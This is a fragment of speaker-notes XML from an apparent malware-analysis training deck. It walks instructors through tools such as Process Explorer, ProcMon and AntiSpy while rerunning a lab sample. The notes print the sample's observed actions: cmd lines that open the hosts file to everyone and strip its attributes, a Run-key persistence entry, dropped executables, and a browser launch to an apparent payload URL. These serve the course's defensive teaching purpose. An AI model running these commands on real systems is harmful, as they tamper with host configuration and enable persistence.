              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>displaydns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Windows search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Wmic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> startup or process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pP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FA3EE01F-8C47-41E7-A336-DD2FB67B46FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>46</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anything visually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> appear?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Can warnings and errors be trusted?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If Windows does not find any malicious system changes, what does that mean?</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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362454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File, registry, disk, memory, network,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> basic static analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Create slides, one for each tool; add notes to cover the topics to be covered for each tool.</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800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ProcessExplorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>: Discuss lower pane, usefulness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> of handles.  Process suspension, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>CreateDump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, Executable properties, image </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, thread suspension, TCP/IP, and Strings.  Right-click select columns-&gt;add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="1"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ProcMon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: Just make the point about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>realtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="1"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AntiSpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, Process: right-click-&gt; Show Tree &amp; Lower Pane (similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>processexplorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>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Driver tab, Start type and load order usefulness</a:t>
            </a:r>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Hooks: Go to Tools ‘Forbid creating file’, then flip back to show it’s hooking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SSDT:NtCreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for protection, right-click restore the function to the original pointer</a:t>
            </a:r>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AutoStart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>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Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="2" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"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t>Now rerun the sample from before (modified malware\Week1\Class1\Lab2\Replication\Sample1\0012b0384774e51acd053c0f6b1dd112) and show the tools in action.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="1"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Process Monitor, filter for bad.exe, and run</a:t>
            </a:r>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Show process activity, </a:t>
            </a:r>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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> /c echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Y|cacls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> C:\WINDOWS\system32\drivers\etc\hosts /t /g </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>everyone:F</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> /c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>attrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> -r -a -s -h C:\WINDOWS\system32\drivers\etc\hosts</a:t>
            </a:r>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Process Create: "C:\Program Files\tongji2.exe“</a:t>
            </a:r>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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> /c ""C:\ntldrs\funbots.bat" “</a:t>
            </a:r>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smtClean="0"/>
              <a:t>"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://timeless888.com/tong.htm</a:t>
            </a:r>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smtClean="0"/>
              <a:t>Show network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>activity</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" baseline="0" dirty="0" smtClean="0"/>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smtClean="0"/>
              <a:t>Show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>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smtClean="0"/>
              <a:t>HKCU\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>skunser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> = C:\ntldrs\svchest.exe</a:t>
            </a:r>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smtClean="0"/>
              <a:t>Show file:</a:t>
            </a:r>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err="1" smtClean="0"/>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" marR="0" lvl="4"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smtClean="0"/>
              <a:t>C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KLTT2YG3\pao[1].exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" marR="0" lvl="4"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smtClean="0"/>
              <a:t>C:\Program Files\tongji2.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" marR="0" lvl="4"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smtClean="0"/>
              <a:t>C:\ntldrs\svchest.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" marR="0" lvl="4"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smtClean="0"/>
              <a:t>C:\ntldrs\Isinter.gif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" marR="0" lvl="4"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smtClean="0"/>
              <a:t>C:\ntldrs\funbots.bat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" marR="0" lvl="4" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>C:\ntldrs\system.yf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>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Show TCP activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="1"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Process Explorer:</a:t>
            </a:r>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Show tongji2.exe process, strings</a:t>
            </a:r>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Show iexplore.exe spawns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="1"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AntiSpy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>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Show process Started Time</a:t>
            </a:r>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Autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, startup, and Scheduled Tasks</a:t>
            </a:r>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Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="1"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FlyPaper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="2"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Show process termination blocking:</a:t>
            </a:r>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Cmd.exe with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in memory</a:t>
            </a:r>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Conhost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>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Attrib</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>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err="1" smtClean="0"/>
              <a:t>Cacls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" marR="0" lvl="3" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Allows for c:\ntldrs\funbots.bat to be seen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" marR="0" lvl="3" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="2" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="2" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="2" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="2" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="2" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="2" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FA3EE01F-8C47-41E7-A336-DD2FB67B46FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>48</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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343028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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362454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50</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7D4FD1-97C0-4CC6-BFE7-8554AA4E42E2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="685800"/>
            <a:ext cx="6096000" cy="3429000"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="617037">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="883967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New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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F23BC-A11C-4520-A18F-B68B3BDFC4E5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="437976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dvla-driving-licence.co.uk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FA3EE01F-8C47-41E7-A336-DD2FB67B46FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2321908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Pros: Discover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> what the author intended the code to do, even if that can not be observed in lab environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cons: Can be expensive;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> out of context and external dependencies can not be evaluated</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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379813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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379813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B95c54fb6124bf91e1aed4d28e78be4e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How are these strings constructed?  What functionality do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> they suggest?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FA3EE01F-8C47-41E7-A336-DD2FB67B46FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379813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Placeholder for examples of binary analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Go over tools (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FileInsight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, HIEW, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PEBrowse</a:t>
            </a:r>
            <a:r>
